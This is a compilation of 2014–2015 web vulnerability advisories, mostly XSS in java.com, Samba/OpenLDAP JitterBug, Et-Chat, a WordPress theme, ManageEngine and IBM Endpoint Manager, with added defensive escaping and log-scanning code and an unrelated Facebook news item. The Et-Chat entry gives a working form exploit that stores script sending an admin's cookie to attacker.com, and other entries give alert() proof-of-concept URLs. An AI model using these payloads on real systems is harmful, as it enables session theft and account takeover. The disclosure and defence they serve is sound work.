Which injects GET vars directly in the generated HTML source :
print_title("%s - %s/%s", lp_title(), directory, cgi_variable("id"));

In the cgi.c file, there is a potential function to escape all dangerous chars :
char *urlquote(char *s)

Screenshots :
======================================================================
- http://www.asafety.fr/data/20141126-RXSS_openldap.org_synetis_001.png
- http://www.asafety.fr/data/20141126-RXSS_openldap.org_synetis_002.png
- http://www.asafety.fr/data/20141126-RXSS_samba.org_synetis_001.png
- http://www.asafety.fr/data/20141126-RXSS_samba.org_synetis_002.png

Solution:
======================================================================
Fixed by OpenLDAP team (no details)
JitterBug is no longer maintained on Samba website.
Thanks to both teams, Samba and OpenLDAP, for their kindness and responsiveness.

Additional resources :
======================================================================
- https://www.samba.org/jitterbug/
- http://www.openldap.org/its/index.cgi/Web?id=7988
- https://bugzilla.samba.org/show_bug.cgi?id=10967
- http://www.asafety.fr/vuln-exploit-poc/contribution-reflected-xss-vulnerabilites-dans-samba-org-et-openldap-org
- http://www.synetis.com

Report timeline :
======================================================================
2014-11-26 : Samba ticket created to alert team with details and PoC.
2014-11-26 : OpenLDAP ticket created to alert team with details and PoC.
2014-11-26 : OpenLDAP fixes the vulnerability.
2014-11-27 : Samba response with additional questions.
2015-03-30 : New comment to get a status
2015-03-30 : JitterBug on Samba.org website is disabled and the project is no longer maintained.
2015-04-02 : Public advisory

Credits :
======================================================================
[Synetis ASCII-art logo]
www.synetis.com
Consulting firm in management and information security

Yann CAM - Security Consultant @ Synetis | ASafety
--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr

Source
14. ######################################################################
# Exploit Title: Java.com RXSS and DOM-XSS
# Date: 01/04/2015
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: java.com: Java + You
# Version: /
# Category: Reflected Cross Site Scripting and DOM based XSS
# Google dork:
# Tested on: Java.com main domain
######################################################################

Java description :
======================================================================
As of 2015, Java is one of the most popular programming languages in use, particularly for client-server web applications, with a reported 9 million developers. Java was originally developed by James Gosling at Sun Microsystems (which has since been acquired by Oracle Corporation) and released in 1995 as a core component of Sun Microsystems' Java platform. The language derives much of its syntax from C and C++, but it has fewer low-level facilities than either of them.

Java.com is the main website to acquire Java JRE or JDK software.

RXSS Vulnerability description - PoC n°1 :
======================================================================
A reflected XSS is available in the java.com main domain. Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Java portals, or capture Java's users' credentials such as cookies. It's also possible to forge a fake Java page with this XSS to provide a backdoored version of software to users.

This reflected XSS is on the GET "n" variable, which is not properly sanitized before being used in the page.

Tested on Firefox 32.0.
PoC:
https://www.java.com/fr/download/faq/index_general.xml?n=20">2</a><script>alert(/Yann CAM @asafety_www.synetis.com/);</script>?printFriendly=true

Screenshots :
======================================================================
- http://www.asafety.fr/data/20141025-java.com_DOMXSS-01.png
- http://www.asafety.fr/data/20141025-java.com_DOMXSS-02.png
- http://www.asafety.fr/data/20141025-java.com_DOMXSS-03.png
- http://www.asafety.fr/data/20141025-java.com_Reflected_XSS-01.png
- http://www.asafety.fr/data/20141025-java.com_Reflected_XSS-02.png

Solution:
======================================================================
Fixed by Oracle/Java Security Team.

Additional resources :
======================================================================
- http://www.java.com/
- http://www.oracle.com/
- http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html
- http://www.asafety.fr/actualites-news/contribution-java-com-dom-xss-reflected-xss
- http://www.synetis.com

Report timeline :
======================================================================
2014-10-25 : Oracle/Java Team alerted with details and PoC.
2014-10-27 : Oracle/Java response and confirm vulnerabilities.
2014-12-23 : Vulnerabilities seem to be fixed.
2015-04-01 : Public advisory

Credits :
======================================================================
[Synetis ASCII-art logo]
www.synetis.com
Consulting firm in management and information security

Yann CAM - Security Consultant @ Synetis | ASafety
--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr

Source: http://packetstorm.wowhacker.com/1504-exploits/javacom-xss.txt
15. # Exploit Title: Et-Chat 3.0.6 Cross Site Scripting Vulnerability
# Google Dork: "ET-Chat v3.0.6"
# Date: 2015-03-20
# Exploit Author: IranHack Security Team
# Tested on: Windows 7
# Vendor : Www.Et-chat.Ir
# Our Website : Www.IranHack.Org
***************************************************
Vulnerable code :
Location : /etchat/class/admin/AdminRoomsIndex.class.php
Code :

    if (is_array($feld)){
        $print_room_list = "<table>";
        foreach($feld as $datasets){
            if ($datasets[0]!=1)
                $print_room_list.= "<tr><td><b>".$datasets[1]."</b></td><td> </td><td><a href=\"./?AdminDeleteRoom&id=".$datasets[0]."&cs4rue=".$_SESSION['etchat_'.$this->_prefix.'CheckSum4RegUserEdit']."\">".$lang->delete[0]->tagData."</a></td><td><a href=\"./?AdminEditRoom&id=".$datasets[0]."\">".$lang->rename[0]->tagData."</a></td><td> <i>".$lang->room_priv[$datasets[2]]->tagData."</i></td></tr>";
            else
                $print_room_list.= "<tr><td><b>".$datasets[1]."</b></td><td> </td><td style=\"color: #888888;\"><strike>".$lang->delete[0]->tagData."</strike></td><td><a href=\"./?AdminEditRoom&id=".$datasets[0]."\">".$lang->rename[0]->tagData."</a></td><td> <i>".$lang->room_priv[$datasets[2]]->tagData."</i></td></tr>";
        }
        $print_room_list.= "</table>";
    }

***************************************************
Description :
This vulnerability allows an attacker to grab the admin cookie and login with the admin account. The reason for this vulnerability is that the values of the room list ( ".$datasets[1]." ) are not filtered, which allows an attacker to run javascript code.
***************************************************
Exploit :
1- Upload this page to a host or set this code in a html page :

<html>
<body>
<form name="exploit" action="http://target.com/etchat/?AdminCreateNewRoom" method="POST">
<input type="hidden" name="room" value="<script>location.href="http://attacker.com/grabber.php?cookie="+escape(document.cookie)</script> " />
<script>document.exploit.submit(); </script>
</form>
</body>
</html>

2- Give the uploaded html page address to the admin.
3- After the admin opens this page, cookies are logged in Log.txt
***************************************************
grabber.php : http://up.iranhack.org/uploads/lquswjwo06vrxz1fe4oo.zip
***************************************************
Patch :
If you want to patch this bug, go to the file " /etchat/class/admin/AdminRoomsIndex.class.php "
Replace this code :
".$datasets[1]."
With this code :
".htmlspecialchars($datasets[1])."
***************************************************
Greetz : Mr.XpR , V30Sharp , AL1R3Z4 , Secret.Walker , Irblackhat , FarbodEZRaeL , black-sec , Mr.X2 , @3is , IR4N0nY , , 0x8F , Amirio , 3cure , FTA_Boy , Mr.FixXxer ./Moji.Rider
Source
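Both the JitterBug advisory (the id parameter concatenated into print_title, so a value containing a closing title tag breaks out of the <title> element) and the Et-Chat post (stored room names echoed into a table, patched with htmlspecialchars) come down to the same defect: untrusted text placed into HTML without output encoding. The block below is an added example, not code from either project: the page builders, the room-row layout and the sample inputs are constructed here, and Python's html.escape stands in for htmlspecialchars. The check helper shows how to verify that escaping actually worked, which is the test a reviewer would run on a fix like the ones proposed above. Note that escaping for HTML text differs from URL quoting (the urlquote the JitterBug advisory points to); for text that lands inside an element, entity encoding is the context-appropriate encoding.

```python
"""Output encoding for reflected and stored input in HTML, with a check
that no markup from untrusted input survives. Added example with constructed
page builders and inputs; not JitterBug or Et-Chat code."""
from html import escape
import re

TAG_RE = re.compile(r"<[^>]+>")


def title_unsafe(directory, ident):
    """Shape of the reported print_title call: the id lands in the page
    verbatim, so a value containing </title>... becomes new markup."""
    return f"<title>Tracker - {directory}/{ident}</title>"


def title_safe(directory, ident):
    """Same page with every untrusted value entity-encoded for text context;
    '<' and '>' in the input can no longer open or close an element."""
    return f"<title>Tracker - {escape(directory)}/{escape(ident)}</title>"


def room_row_unsafe(room_id, name):
    """Shape of the Et-Chat room list: the stored name goes in unescaped."""
    return (f'<tr><td><b>{name}</b></td>'
            f'<td><a href="./?AdminEditRoom&amp;id={room_id}">rename</a></td></tr>')


def room_row_safe(room_id, name):
    """The htmlspecialchars-style fix: escape the name (text context) and
    the id (attribute context, hence quote=True so quotes are encoded too)."""
    return ('<tr><td><b>{}</b></td>'
            '<td><a href="./?AdminEditRoom&amp;id={}">rename</a></td></tr>'
            .format(escape(name), escape(str(room_id), quote=True)))


def foreign_tags(rendered, template_tags):
    """Tags present in the rendered HTML beyond the fixed set the template
    itself emits. A non-empty result means untrusted input became markup;
    this is the assertion to put in a regression test for an XSS fix."""
    allowed = {t.lower() for t in template_tags}
    return [t for t in TAG_RE.findall(rendered) if t.lower() not in allowed]


if __name__ == "__main__":
    # Constructed breakout sample: closes the title and inserts an element.
    sample = "1337</title><b>injected</b><title>"
    print(foreign_tags(title_unsafe("CVS", sample), {"<title>", "</title>"}))
    print(foreign_tags(title_safe("CVS", sample), {"<title>", "</title>"}))
```

Running the block prints ['<b>', '</b>'] for the unsafe builder and [] for the escaped one; the same foreign_tags check applied to the stored-name case distinguishes the vulnerable and patched room rows.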
16. *WordPress Daily Edition Theme v1.6.2 XSS (Cross-site Scripting) Security Vulnerabilities*

Exploit Title: WordPress Daily Edition Theme /fiche-disque.php id Parameters XSS Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.* v1.5.* v1.4.* v1.3.* v1.2.* v1.1.* v.1.0.*
Tested Version: v1.6.2
Advisory Publication: March 10, 2015
Latest Update: March 10, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore]

*Advisory Details:*

*(1) Vendor & Product Description:*

*Vendor:*
WooThemes

*Product & Vulnerable Versions:*
WordPress Daily Edition Theme
version 1.6.7, 1.6.6, 1.6.5, 1.6.4, 1.6.3, 1.6.2, 1.6.1, 1.6
version 1.5
version 1.4.11, 1.4.10, 1.4.9, 1.4.8, 1.4.7, 1.4.6, 1.4.5, 1.4.4, 1.4.3, 1.4.2, 1.4.1, 1.4.0
version 1.3.2, 1.3.1, 1.3
version 1.2.1, 1.2
version 1.1.2, 1.1.1, 1.1
version 1.0.12, 1.0.11, 1.0.10, 1.0.9, 1.0.8, 1.0.7, 1.0.6, 1.0.5, 1.0.4, 1.0.3, 1.0.2, 1.0.1, 1.0

*Vendor URL & buy:*
WordPress Daily Edition Theme can be got from here,
http://www.woothemes.com/products/daily-edition/
http://dzv365zjfbd8v.cloudfront.net/changelogs/dailyedition/changelog.txt

*Product Introduction:*
"Daily Edition WordPress Theme developed by wootheme team and Daily Edition is a clean, spacious newspaper/magazine theme designed by Liam McKay.
With loads of home page modules to enable/disable and a unique java script-based featured scroller and video player the theme oozes sophistication"

"The Daily Edition theme offers users many options, controlled from the widgets area and the theme options page – it makes both the themes appearance and functions flexible. From The Daily Edition 3 option pages you can for example add your Twitter and Google analytics code, some custom CSS and footer content – and in the widgets area you find a practical ads management."

"Unique Features
These are some of the more unique features that you will find within the theme:
- A neat javascript home page featured slider, with thumbnail previews of previous/next slides on hover over the dots.
- A “talking points” home page that can display posts according to tags, in order of most commented to least commented. A great way to highlight posts gathering dust in the archives.
- A customizable home page layout with options to specify how many full width blog posts and how many “box” posts you would like to display.
- A javascript home page video player with thumbnail hover effect.
- 16 delicious colour schemes to choose from!"

*(2) Vulnerability Details:*
WordPress Daily Edition Theme web application has a security bug problem. It can be exploited by XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server.

*(2.1)* The code programming flaw occurs at "fiche-disque.php?" page with "id" parameters.
*References:*
http://tetraph.com/security/xss-vulnerability/wordpress-daily-edition-theme-v1-6-2-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162-xss.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-xss-cross-site-scripting-security-vulnerabilities/
https://webtechwire.wordpress.com/2015/03/10/wordpress-daily-edition-theme-v1-6-2-xss-cross-site-scripting-security-vulnerabilities/
http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=142426561507008&w=2
https://cxsecurity.com/issue/WLB-2015030029

--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious

Source
17. #####################################
Title:- Reflected cross-site scripting(XSS) Vulnerability in Manage Engine AD Audit Manager Plus Admin Panel(Build 6270)
Author: Harish Ramadoss - Help AG Middle East
Vendor: ZOHO Corp
Product: Manage Engine AD Audit Manager Plus
Version: All versions below Build 6270 are mostly affected
Tested Version: Build 6270
Severity: Medium
CVE Reference: CVE-2015-1026

# About the Product:
ADManager Plus is a Windows Active Directory Management and Reporting Solution that helps AD Administrators and Help Desk Technicians with their day-to-day activities. The software handles a variety of complex tasks like Bulk Management of User accounts and other AD objects, Delegate Role based access to Help Desk Technicians, and generates an exhaustive list of AD Reports.

# Description:
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This leads to compromising the whole domain as the application normally uses a privileged domain account to perform administration tasks.

# Vulnerability Class:
Reflected cross-site scripting(XSS) - https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

# How to Reproduce: (POC):
1. “technicianSearchText” parameter is vulnerable to XSS on “Help Desk Technician” page. The page can be found at : AD Delegation -> Help Desk Technician
2. "rolesSearchText" parameter is vulnerable to XSS on “Help Desk Roles” page. The page can be found at : AD Delegation -> Help Desk Roles

Proof of Concept code to test XSS :
<b onmouseover=alert(document.cookie)>Hover over me!</b>

# Disclosure:
Discovered: December 08, 2014
Vendor Notification: Jan 22, 2015
Public Disclosure: Mar 10, 2015

# Affected Targets:
All versions below Build 6270 are mostly affected. On all platforms (Actually platform doesn't affect the issue).
# credits:
Harish Ramadoss
Information Security Analyst
Help AG Middle East

#References:
[1] help AG middle East http://www.helpag.com/.
[2] https://www.manageengine.com/products/ad-manager/
[4] https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29(XSS)
[5] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.

Source
18. *WordPress Daily Edition Theme v1.6.2 SQL Injection Security Vulnerabilities*

Exploit Title: WordPress Daily Edition Theme v1.6.2 /fiche-disque.php id Parameters SQL Injection Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.2
Tested Version: v1.6.2
Advisory Publication: Mar 07, 2015
Latest Update: Mar 07, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore]

*Advisory Details:*

*(1) Vendor & Product Description:*

*Vendor:*
WooThemes

*Product & Version:*
WordPress Daily Edition Theme v1.6.2

*Vendor URL & Download:*
WordPress Daily Edition Theme can be got from here,
http://www.woothemes.com/products/daily-edition/

*Product Introduction:*
"Daily Edition WordPress Theme developed by wootheme team and Daily Edition is a clean, spacious newspaper/magazine theme designed by Liam McKay. With loads of home page modules to enable/disable and a unique java script-based featured scroller and video player the theme oozes sophistication"

"The Daily Edition theme offers users many options, controlled from the widgets area and the theme options page – it makes both the themes appearance and functions flexible. From The Daily Edition 3 option pages you can for example add your Twitter and Google analytics code, some custom CSS and footer content – and in the widgets area you find a practical ads management."

"Unique Features
These are some of the more unique features that you will find within the theme:
- A neat javascript home page featured slider, with thumbnail previews of previous/next slides on hover over the dots.
- A “talking points” home page that can display posts according to tags, in order of most commented to least commented. A great way to highlight posts gathering dust in the archives.
- A customizable home page layout with options to specify how many full width blog posts and how many “box” posts you would like to display.
- A javascript home page video player with thumbnail hover effect.
- 16 delicious colour schemes to choose from!"

*(2) Vulnerability Details:*
WordPress Daily Edition Theme web application has a security bug problem. It can be exploited by SQL Injection attacks. This may allow a remote attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

*(2.1)* The code flaw occurs at "fiche-disque.php?" page with "&id" parameter.

*References:*
http://www.tetraph.com/security/sql-injection-vulnerability/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162-sql.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
https://itswift.wordpress.com/2015/03/07/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
http://seclists.org/fulldisclosure/2015/Mar/27
http://packetstormsecurity.com/files/130075/SmartCMS-2-SQL-Injection.html

--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

Source

*WordPress Daily Edition Theme v1.6.2 Unrestricted Upload of File Security Vulnerabilities*

Exploit Title: WordPress Daily Edition Theme v1.6.2 /thumb.php src Parameter Unrestricted Upload of File Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.2
Tested Version: v1.6.2
Advisory Publication: Mar 07, 2015
Latest Update: Mar 07, 2015
Vulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434]
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore]

*Advisory Details:*

*(1) Vendor & Product Description:*

*Vendor:*
WooThemes

*Product & Version:*
WordPress Daily Edition Theme v1.6.2

*Vendor URL & Download:*
WordPress Daily Edition Theme can be got from here,
http://www.woothemes.com/products/daily-edition/

*Product Introduction:*
"Daily Edition WordPress Theme developed by wootheme team and Daily Edition is a clean, spacious newspaper/magazine theme designed by Liam McKay. With loads of home page modules to enable/disable and a unique java script-based featured scroller and video player the theme oozes sophistication"

"The Daily Edition theme offers users many options, controlled from the widgets area and the theme options page – it makes both the themes appearance and functions flexible. From The Daily Edition 3 option pages you can for example add your Twitter and Google analytics code, some custom CSS and footer content – and in the widgets area you find a practical ads management."

"Unique Features
These are some of the more unique features that you will find within the theme:
- A neat javascript home page featured slider, with thumbnail previews of previous/next slides on hover over the dots.
- A “talking points” home page that can display posts according to tags, in order of most commented to least commented.
  A great way to highlight posts gathering dust in the archives.
- A customizable home page layout with options to specify how many full width blog posts and how many “box” posts you would like to display.
- A javascript home page video player with thumbnail hover effect.
- 16 delicious colour schemes to choose from!"

*(2) Vulnerability Details:*
WordPress Daily Edition Theme web application has a security bug problem. It can be exploited by "Unrestricted Upload of File" (Arbitrary File Uploading) attacks. With a specially crafted request, a remote attacker can include arbitrary files from the targeted host or from a remote or local host. This may allow disclosing file contents or executing files like PHP scripts. Such attacks are limited due to the script only calling files already on the target host.

*(2.1)* The code flaw occurs at "thumb.php?" page with "src" parameters.

*References:*
http://tetraph.com/security/unrestricted-upload-of-file-arbitrary/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
https://itswift.wordpress.com/2015/03/07/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
http://seclists.org/fulldisclosure/2015/Mar/4
http://packetstormsecurity.com/files/130653/Webshop-Hun-1.062S-Directory-Traversal.html

--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

Source
19. Do you own a Facebook Business page? If yes, then you will notice a drop in the number of "likes" on your Facebook Page by next week, which could be quite disappointing but, Facebook believes, will help businesses to know their actual followers.

FACEBOOK'S OFFICIAL MASS AUTO-UNLIKE

The social network giant is giving its Pages a little spring cleaning, purging them of memorialized and voluntarily deactivated inactive Facebook accounts in an attempt to make its users' data more meaningful for businesses and brands. The Facebook purge will begin from March 12, Facebook said, and should continue over the next few weeks.

FACEBOOK TO DETECT FAKE FOLLOWERS

Facebook is also taking steps to improve how it detects fake profiles. We all know that a number of Businesses and Brands buy fake Facebook Likes and Twitter followers in order to show their brand popularity. Social Media giants, Facebook, Twitter and Google, have emerged as major players in recent general elections in India, where political parties spend millions of dollars to buy numbers of Followers and advertise their promo campaigns to impact Election results.

BENEFITS OF REMOVING INACTIVE USERS FROM LIKES

According to Facebook, there are two main reasons to remove inactive Facebook accounts from Page audience:

- Accurate Likes
- Keeping Actual followers on the Top

With more accurate "like" counts, businesses and brands could better understand how many followers are actually interested in their contents and products. Facebook wants to give businesses “up-to-date insights” on their pages’ active followers. The move will give businesses more precise information about those Facebook users who are actively following their Facebook Page and make better use of Facebook’s Custom Audiences tool, which lets businesses create followers — aka lookalike audiences — by finding people on Facebook who are similar to those who already follow the company’s page.
The company also wants to make business results consistent with individual users’ experiences. Facebook already filters out "likes and comments generated by deactivated or memorialized accounts from individual Page posts." While, the decrease in number of followers may disappoint you at the very first time, but at the same time it will help you gain a more accurate way to track your customers and grow your followers with authentic number of likes, which will be more beneficial to your business. Source
  20. Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics Page

During a penetration test, RedTeam Pentesting discovered that the IBM Endpoint Manager Relay Diagnostics page allows anybody to persistently store HTML and JavaScript code that is executed when the page is opened in a browser.

Details
=======

Product: IBM Endpoint Manager
Affected Versions: 9.1.x versions earlier than 9.1.1229, 9.2.x versions earlier than 9.2.1.48
Fixed Versions: 9.1.1229, 9.2.1.48
Vulnerability Type: Cross-Site Scripting
Security Risk: medium
Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013
Advisory Status: published
CVE: CVE-2014-6137
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137

Introduction
============

IBM Endpoint Manager products - built on IBM BigFix technology - can help you achieve smarter, faster endpoint management and security. These products enable you to see and manage physical and virtual endpoints including servers, desktops, notebooks, smartphones, tablets and specialized equipment such as point-of-sale devices, ATMs and self-service kiosks. Now you can rapidly remediate, protect and report on endpoints in near real time.

(from the vendor's homepage)

More Details
============

Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint Manager, or TEM) components, such as TEM Root Servers or TEM Relays, typically serve HTTP and HTTPS on port 52311. There, the server or relay diagnostics page is normally accessible at the path /rd. That page can be accessed without authentication and lets users query and modify different information.

For example, a TEM Relay can be instructed to gather a specific version of a certain Fixlet site by requesting a URL such as the following:

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
BESGatherMirrorNew.exe/-gatherversion
?Body=GatherSpecifiedVersion
&url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite
&version=1
&useCRC=0

The URL parameter url is susceptible to cross-site scripting. When the following URL is requested, the browser executes the JavaScript code provided in the parameter:

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
BESGatherMirrorNew.exe/-gatherversion
?Body=GatherSpecifiedVersion
&version=1
&url=http://"><script>alert(/XSS/)</script>
&version=1
&useCRC=0

The value of that parameter is also stored in the TEM Relay's site list, so that the embedded JavaScript code is executed whenever the diagnostics page is opened in a browser:

$ curl http://tem-relay.example.com:52311/rd
[...]
<select NAME="url">
[...]
<option>http://"><script>alert(/XSS/)</script></option>
</select>

Proof of Concept
================

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
BESGatherMirrorNew.exe/-gatherversion
?Body=GatherSpecifiedVersion&version=1
&url=http://"><script>alert(/XSS/)</script>
&version=1
&useCRC=0

Fix
===

Upgrade IBM Endpoint Manager to version 9.1.1229 or 9.2.1.48.

Security Risk
=============

As the relay diagnostics page is typically not frequented by administrators and does not normally require authentication, it is unlikely that the vulnerability can be exploited to automatically and reliably attack administrative users and obtain their credentials. Nevertheless, the ability to host arbitrary HTML and JavaScript code on the relay diagnostics page, i.e. on a trusted system, may allow attackers to conduct very convincing phishing attacks. This vulnerability is therefore rated as a medium risk.

Timeline
========

2014-07-29 Vulnerability identified during a penetration test
2014-08-06 Customer approves disclosure to vendor
2014-09-03 Vendor notified
2015-01-13 Vendor releases security bulletin and software upgrade
2015-02-04 Customer approves public disclosure
2015-02-10 Advisory released

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de.

--
RedTeam Pentesting GmbH                 Tel.: +49 241 510081-0
Dennewartstr. 25-27                     Fax : +49 241 510081-99
52068 Aachen                            https://www.redteam-pentesting.de
Germany                                 Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

Source
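A defender's view of the advisory above, as an added example that is not part of the RedTeam advisory or of IBM's product: it scans web-server access log lines for requests to the gather endpoint whose url parameter is not a plain URL (the stored-XSS vector the advisory describes), and shows the rendering-side fix, HTML-escaping stored values before they go into the <option> list. The log format, IP addresses and timestamps are constructed; only the path, parameter names and the PoC payload come from the advisory.

```python
"""Added example (not from the RedTeam advisory): spotting CVE-2014-6137-style
requests in access logs and rendering the relay site list safely.

Assumptions (not from the advisory): the relay logs requests in a Common Log
Format-like line, and the site list is rendered by a function we control here.
"""
import html
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (not real traffic). The path and parameter names
# come from the advisory; the hosts, IPs and timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Feb/2015:10:00:01 +0100] "GET /cgi-bin/bfenterprise/BESGatherMirrorNew.exe/-gatherversion?Body=GatherSpecifiedVersion&url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite&version=1&useCRC=0 HTTP/1.1" 200 512
10.0.0.9 - - [10/Feb/2015:10:00:07 +0100] "GET /cgi-bin/bfenterprise/BESGatherMirrorNew.exe/-gatherversion?Body=GatherSpecifiedVersion&version=1&url=http://%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&version=1&useCRC=0 HTTP/1.1" 200 512
10.0.0.7 - - [10/Feb/2015:10:00:09 +0100] "GET /rd HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)
GATHER_PATH = "/cgi-bin/bfenterprise/BESGatherMirrorNew.exe/-gatherversion"


def parse_line(line):
    """Split one access-log line into fields, with the query string decoded."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def url_param_is_suspicious(value):
    """A legitimate gather URL is a bare http(s) URL with a host and a simple
    path; HTML metacharacters or a missing host mean it is not a URL at all."""
    if not re.match(r'^https?://[A-Za-z0-9.\-]+(:\d+)?(/[^\s"<>\']*)?$', value):
        return True
    return any(c in value for c in '<>"\'')


def find_xss_attempts(log_text):
    """Return (client ip, decoded url value) for each gather request whose
    url parameter does not look like a plain URL."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["path"] != GATHER_PATH:
            continue
        for value in rec["params"].get("url", []):
            if url_param_is_suspicious(value):
                hits.append((rec["ip"], value))
    return hits


def render_site_list(urls):
    """The rendering-side fix: HTML-escape stored values before placing them
    in <option> elements, so a stored '"><script>' stays inert text."""
    options = "".join("<option>%s</option>" % html.escape(u, quote=True) for u in urls)
    return '<select NAME="url">%s</select>' % options


if __name__ == "__main__":
    for ip, value in find_xss_attempts(SAMPLE_LOG):
        print("suspicious url parameter from %s: %r" % (ip, value))
    print(render_site_list([v for _, v in find_xss_attempts(SAMPLE_LOG)]))
```

Because the value is stored in the relay's site list, a single hit in the log is enough to taint every later visit to /rd, so the detection is worth running over historical logs as well as live ones; the escaping function is what the diagnostics page should have done regardless.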
  21. Introduction

In this last part of the Website Hacking series, we are going to list 18 common web vulnerabilities and flaws and we are going to briefly provide solutions to them. Some of them are described for the first time in the Website Hacking series and some we have discussed before but in greater depth.

1. Saving all user input

If you are using a framework, for example, a PHP framework, you might be tempted to save all user input to your model or database since it has already been validated and escaped. Let us say that you are using CakePHP and have included a registration form using CakePHP’s Form helper.

SNIPPET 1

Now, you might be tempted to save all data from CakePHP’s $this->request->data array/method as is if you do not read the docs carefully or view some of the examples provided there (the live blog site).

SNIPPET 2

You just save all data and thank the framework creators. However, there are at least two things you did wrong: $this->request->data does not contain escaped/sanitized input, just the input from the superglobals. Firstly, you should use CakePHP’s h() function to prevent people inserting tags in their username, like this: h($this->request->data)

